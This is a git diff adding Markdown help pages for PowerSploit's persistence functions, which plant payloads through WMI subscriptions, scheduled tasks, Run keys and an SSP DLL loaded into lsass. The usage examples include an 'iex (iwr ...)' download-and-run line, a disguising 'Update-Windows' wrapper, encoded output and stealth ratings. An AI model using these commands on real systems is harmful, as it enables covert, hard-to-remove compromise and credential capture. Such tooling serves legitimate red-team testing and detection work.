5 files changed, 738 insertions, 0 deletions
diff --git a/docs/Persistence/Add-Persistence.md b/docs/Persistence/Add-Persistence.md
new file mode 100755
index 0000000..bdd14fb
--- /dev/null
+++ b/docs/Persistence/Add-Persistence.md
@@ -0,0 +1,227 @@
+# Add-Persistence
+
+## SYNOPSIS
+Add persistence capabilities to a script.
+
+PowerSploit Function: Add-Persistence  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption  
+Optional Dependencies: None
+
+## SYNTAX
+
+### ScriptBlock
+```
+Add-Persistence -ScriptBlock <ScriptBlock> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
+ [-DoNotPersistImmediately] [-PassThru]
+```
+
+### FilePath
+```
+Add-Persistence -FilePath <String> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
+ [-DoNotPersistImmediately] [-PassThru]
+```
+
+## DESCRIPTION
+Add-Persistence will add persistence capabilities to any script or scriptblock.
+This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+```
+
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
+
+Description
+-----------
+Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.
+elevated) determined at runtime.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
+```
+
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
+
+Description
+-----------
+Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.
+elevated) determined at runtime.
+The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement.
+The final, encoded output is finally saved to .\EncodedPersistentScript.ps1
+
+## PARAMETERS
+
+### -ScriptBlock
+Specifies a scriptblock containing your payload.
+
+```yaml
+Type: ScriptBlock
+Parameter Sets: ScriptBlock
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -FilePath
+Specifies the path to your payload.
+
+```yaml
+Type: String
+Parameter Sets: FilePath
+Aliases: Path
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ElevatedPersistenceOption
+Specifies the trigger for the persistent payload if the target is running elevated.
+You must run New-ElevatedPersistenceOption to generate this argument.
+
+```yaml
+Type: Object
+Parameter Sets: (All)
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserPersistenceOption
+Specifies the trigger for the persistent payload if the target is not running elevated.
+You must run New-UserPersistenceOption to generate this argument.
+
+```yaml
+Type: Object
+Parameter Sets: (All)
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PersistenceScriptName
+Specifies the name of the function that will wrap the original payload.
+The default value is 'Update-Windows'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: Update-Windows
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PersistentScriptFilePath
+Specifies the path where you would like to output the persistence script.
+By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: "$PWD\Persistence.ps1"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RemovalScriptFilePath
+Specifies the path where you would like to output a script that will remove the persistent payload.
+By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: "$PWD\RemovePersistence.ps1"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DoNotPersistImmediately
+Output only the wrapper function for the original payload.
+By default, Add-Persistence will output a script that will automatically attempt to persist (e.g.
+it will end with 'Update-Windows -Persist').
+If you are in a position where you are running in memory but want to persist at a later time, use this option.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PassThru
+Outputs the contents of the persistent script to the pipeline.
+This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### None
+
+Add-Persistence cannot receive any input from the pipeline.
+
+## OUTPUTS
+
+### System.Management.Automation.ScriptBlock
+
+If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.
+
+## NOTES
+When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
diff --git a/docs/Persistence/Get-SecurityPackage.md b/docs/Persistence/Get-SecurityPackage.md
new file mode 100755
index 0000000..2a0cdef
--- /dev/null
+++ b/docs/Persistence/Get-SecurityPackage.md
@@ -0,0 +1,37 @@
+# Get-SecurityPackage
+
+## SYNOPSIS
+Enumerates all loaded security packages (SSPs).
+
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-SecurityPackage
+```
+
+## DESCRIPTION
+Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
+It also parses the returned SecPkgInfo struct array.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-SecurityPackage
+```
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Persistence/Install-SSP.md b/docs/Persistence/Install-SSP.md
new file mode 100755
index 0000000..99193c0
--- /dev/null
+++ b/docs/Persistence/Install-SSP.md
@@ -0,0 +1,60 @@
+# Install-SSP
+
+## SYNOPSIS
+Installs a security support provider (SSP) dll.
+
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Install-SSP [[-Path] <String>]
+```
+
+## DESCRIPTION
+Install-SSP installs an SSP dll.
+Installation involves copying the dll to
+%windir%\System32 and adding the name of the dll to
+HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Install-SSP -Path .\mimilib.dll
+```
+
+## PARAMETERS
+
+### -Path
+{{Fill Path Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+The SSP dll must match the OS architecture.
+i.e.
+You must have a 64-bit SSP dll
+if you are running a 64-bit OS.
+In order for the SSP dll to be loaded properly
+into lsass, the dll must export SpLsaModeInitialize.
+
+## RELATED LINKS
+
diff --git a/docs/Persistence/New-ElevatedPersistenceOption.md b/docs/Persistence/New-ElevatedPersistenceOption.md
new file mode 100755
index 0000000..efe215d
--- /dev/null
+++ b/docs/Persistence/New-ElevatedPersistenceOption.md
@@ -0,0 +1,235 @@
+# New-ElevatedPersistenceOption
+
+## SYNOPSIS
+Configure elevated persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-ElevatedPersistenceOption  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+### PermanentWMIAtStartup
+```
+New-ElevatedPersistenceOption [-PermanentWMI] [-AtStartup]
+```
+
+### PermanentWMIDaily
+```
+New-ElevatedPersistenceOption [-PermanentWMI] [-Daily] -At <DateTime>
+```
+
+### ScheduledTaskOnIdle
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-OnIdle]
+```
+
+### ScheduledTaskAtLogon
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-AtLogon]
+```
+
+### ScheduledTaskHourly
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-Hourly]
+```
+
+### ScheduledTaskDaily
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
+```
+
+### Registry
+```
+New-ElevatedPersistenceOption [-Registry] [-AtLogon]
+```
+
+## DESCRIPTION
+New-ElevatedPersistenceOption allows for the configuration of elevated persistence options.
+The output of this function is a required parameter of Add-Persistence.
+Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+```
+
+## PARAMETERS
+
+### -PermanentWMI
+Persist via a permanent WMI event subscription.
+This option will be the most difficult to detect and remove.
+
+Detection Difficulty:        Difficult
+Removal Difficulty:          Difficult
+User Detectable? 
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIAtStartup, PermanentWMIDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ScheduledTask
+Persist via a scheduled task.
+
+Detection Difficulty:        Moderate
+Removal Difficulty:          Moderate
+User Detectable? 
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskAtLogon, ScheduledTaskHourly, ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Registry
+Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
+Note: This option will briefly pop up a PowerShell console to the user.
+
+Detection Difficulty:        Easy
+Removal Difficulty:          Easy
+User Detectable? 
+Yes
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Daily
+Starts the payload daily.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Hourly
+Starts the payload hourly.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskHourly
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -At
+Starts the payload at the specified time.
+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+```yaml
+Type: DateTime
+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OnIdle
+Starts the payload after one minute of idling.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtLogon
+Starts the payload upon any user logon.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskAtLogon, Registry
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtStartup
+Starts the payload within 240 and 325 seconds of computer startup.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIAtStartup
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
diff --git a/docs/Persistence/New-UserPersistenceOption.md b/docs/Persistence/New-UserPersistenceOption.md
new file mode 100755
index 0000000..c7c020f
--- /dev/null
+++ b/docs/Persistence/New-UserPersistenceOption.md
@@ -0,0 +1,179 @@
+# New-UserPersistenceOption
+
+## SYNOPSIS
+Configure user-level persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-UserPersistenceOption  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+### ScheduledTaskOnIdle
+```
+New-UserPersistenceOption [-ScheduledTask] [-OnIdle]
+```
+
+### ScheduledTaskHourly
+```
+New-UserPersistenceOption [-ScheduledTask] [-Hourly]
+```
+
+### ScheduledTaskDaily
+```
+New-UserPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
+```
+
+### Registry
+```
+New-UserPersistenceOption [-Registry] [-AtLogon]
+```
+
+## DESCRIPTION
+New-UserPersistenceOption allows for the configuration of elevated persistence options.
+The output of this function is a required parameter of Add-Persistence.
+Available persitence options in order of stealth are the following: scheduled task, registry.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+```
+
+## PARAMETERS
+
+### -ScheduledTask
+Persist via a scheduled task.
+
+Detection Difficulty:        Moderate
+Removal Difficulty:          Moderate
+User Detectable? 
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskHourly, ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Registry
+Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
+Note: This option will briefly pop up a PowerShell console to the user.
+
+Detection Difficulty:        Easy
+Removal Difficulty:          Easy
+User Detectable? 
+Yes
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Daily
+Starts the payload daily.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Hourly
+Starts the payload hourly.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskHourly
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -At
+Starts the payload at the specified time.
+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+```yaml
+Type: DateTime
+Parameter Sets: ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OnIdle
+Starts the payload after one minute of idling.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtLogon
+Starts the payload upon any user logon.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+